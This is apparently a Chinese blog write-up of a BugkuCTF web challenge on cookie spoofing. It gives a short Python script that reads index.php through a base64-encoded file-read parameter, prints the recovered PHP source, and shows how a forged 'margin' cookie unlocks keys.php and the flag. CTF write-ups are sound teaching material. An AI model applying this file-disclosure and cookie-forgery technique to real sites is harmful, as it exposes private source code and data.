【BugkuCTF】Web--cookies欺骗

最新推荐文章于 2023-07-19 09:45:35 发布
最新推荐文章于 2023-07-19 09:45:35 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: ctf.bugku.com
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34072526/article/details/86922462
版权

Description:

http://123.206.87.240:8002/web11/

答案格式:KEY{xxxxxxxx}

Solution:

打开网页,发现URL有一段Base64URL解码得keys.txt,试了一些方法之后,将index.php也Base64编码了一下,尝试用filename读取index.php发现出现了php的第一行,所以这里我选择用python遍历index.php

代码(经过测试,一共18行代码)

import requests
s = requests.session()
for line in range(1, 19):
    url = 'http://123.206.87.240:8002/web11/index.php?line={}&filename=aW5kZXgucGhw'.format(line)
    print(s.get(url).text)


得到php代码

error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}

if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>

从php代码中可以看出来,我们需要将keys.php这段字符串Base64加密
a2V5cy5waHA=
然后将其作为filename的值,还要构造Cookie: margin=margin这个Cookie头完成任务!

Flag:

KEY{key_keys}

VZZmieshenquan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
[CTF攻防世界] WEB区 关于Cookie题目
weixin_43586169的博客
04-14 1718
描述关于Cookie题目
CTFHub | Cookie注入
尼泊罗河伯的博客
11-20 1643
根据网页显示内容提示,这题关于 Cookie 注入,Cookie 注入和之前的注入手法一致,只不过需要在网页 Cookie 修改其参数进行注入判断,那么直接打开工具 BurpSuite 对题目网站进行抓包。判断发现存在 Cookie 注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
CTF web入门——HTTP头相关的----修改请求头、伪造Cookie题目——Bugku Web题目详细题解
热门推荐
日熙的博客
07-25 6万+
题目一:Bugku 程序员本地网站 1.打开题目显示如下: 题目二:Bugku 管理员系统 题目三:XCTF xff_referer
CTF web题总结--http header 修改、cookie注入
bob的博客
08-31 5828
内网访问,X-Forward-For:127.0.0.1 Accept-Language User-Agent status=login
CTF-Web20(涉及简单的cookie与session)
→_→
09-21 4761
20.Guess Next Session 分析: 观察代码,在代码并没有什么函数,关键就在于:password = $_session['password']。 问题到了这一步,让我们把这放下,先来分析一下PHP的Session和CookieCookie与 Session,一般都会认为这是两个独立完全不同的东西,Session采用的是在服务器端保持状态的方案,而Cookie采用的是在客户端保持状态的方案。在PHP配置的默认情况下,Session是用Session ID来确.
web-ctf-help:脚本集,以帮助基于Webctfs
02-24
用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies COOKIES] [--flags FLAGS] [-f] urlpositional arguments: url URL of the target websiteoptional arguments: -h, --...
react-native-cookies:React Native的Cookie管理器
02-04
安装yarn add react-native-cookies连结自动(推荐) react-native link react-native-cookies手册如果自动链接不起作用,则可以按照以下说明手动链接此库:的iOS 在Xcode打开您的项目,右键单击“ Libraries ,...
chrome-extension-cookies-sample
05-05
Chrome示例Cookie使用扩展该扩展程序演示了如何通过Chrome扩展程序从网站读取Cookie。 看似需要读取Cookie的一个用例正在执行从一个网站到另一个网站的XMLHttpRequest调用,例如,将数据从第二个网站显示到第一个...
awesome-web-storage:您需要了解的有关客户端存储的所有信息
02-02
Web存储是现代Web开发的重要组成部分,特别是在构建复杂的单页应用程序(SPA)和提供离线体验时。"awesome-web-storage"项目集成了关于客户端存储的各种资源,帮助开发者深入理解并有效利用这些技术。以下是关于...
CTF练习题[WEB]-cookies
weixin_45246254的博客
02-10 2722
https://ctf.bugku.com/challenges/detail/id/87.html 拿到题目如下,提示:Cookies欺骗 访问跳转到以下地址 http://114.67.175.224:15773/index.php?line=&filename=a2V5cy50eHQ= filename看起来就是base64,拿去解码 扫目录没有发现其他可疑文件 推测攻破点就在这个filename这里了,另外还有个line变量 先把line拿去遍历,没有发现什么 已知的还有一个文件就是
CTFweb——cookie
weixin_61167540的博客
11-23 1734
在cmd输入:curl -i http://challenge-5460ffbe35aa75a0.sandbox.ctfhub.com:10800/ --cookie "admin=1"这里之所以设置cookie为admin=1,是因为上图看到网页的请求头里admin=0,也就是设置的不是admin用户去访问的,改成1就好啦。cookie是存储再客户端上的一小段数据,浏览器(即客户端)通过HTTP协议和服务器端进行cookie交互,通常用来存储一些不敏感信息。
BugkuCTF-WEBcookie欺骗
am_03的博客
08-29 876
知识点 isset: 检测变量是否设置,并且不是 NULL $_GET:收集来自 method=“get” 的表单里的值 intval() 函数用于获取变量的整数值。 in_array() 函数搜索数组里是否存在指定的值。 举例: <?php $am = array("Bill", "Steve", "trump", "David"); if (in_array("trump", $am)) { echo "匹配已找到"; } else { echo "匹配未找到"; } ?&
BugKuCTF套路满满的题-------Cookie欺骗
qq_42133828的博客
12-19 2289
这一题,首先看题目Cookie欺骗,那么什么是Cookie欺骗呢?      看了网上的一些博客后,我想可以总结一句话就是: 你在火狐成功登陆了一个账号,并且把session_id记录下来,转而去其他浏览器登陆此账号,但此时的登陆不需要密码和账号,只需要把Session_id传给服务器,便可成功登陆  好了,话不多说,直接上。。。      首先,界面给出的是一串字符,当我想并没有什么用...
CTF攻防世界web题思路解析4cookie.
m0_63687631的博客
12-22 828
1.打开网站 2.查找什么是cookie然后查找得到如何得到的方法;先查看源码 3.在控制台输入 4.然后得到界面在网址栏输入/cookie.php并访问 5.访问出这个,查看http响应 6.如图在网络找到http相应得到的消息头即可获得flag 知识点: A cookie是服务器发给浏览器的一个身份验证信息的一个值 B 获得方式有通过控制器输入 document.cookie和网络获得 ...
CG-CTF-Web-COOKIE
1stPeak's Blog
06-28 2677
COOKIE 1.题目 2.访问题目地址,页面无显示 源代码无显示: 3.那就抓包!! 看到上图Cookie,让我又联想到题目Cookie与Tip:0==not 一开始我还真是使用Login=not来发包,结果得不到flag,原来它这个Tip是告诉你0是错误的,并不是0=not,并且,这里是==,又让我想到会不会是弱类型比较(最后返回true(表示是1)或者false(表示0))。 ...
buuctf-Cookie Store
m0_62094846的博客
05-18 145
题目提示cookie,抓包后在cookie后看到有点特别的东西,试一下base64 (花了一块,本来应该是50的)把49改成100,然后加密填回去 再购买flag就可以了
Mimikyu靶场 基础题12道(CTF超级入门题)
Continuejww的博客
07-19 604
靶场主页解决方法:一是F12,二是burp抓包F12查看response包查看。
BUUCTFweb方向题目记录(二)
wanan的博客
10-06 4万+
BUUCTFweb方向题目记录(二)
uni-app获取cookies
最新发布
09-13
在uni-app获取cookies可以通过以下步骤: 1. 首先,确保你的uni-app项目使用了vue-cookies插件。你可以通过在命令行执行以下命令来安装它: ``` npm install vue-cookies --save ``` 2. 在你的uni-app项目的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值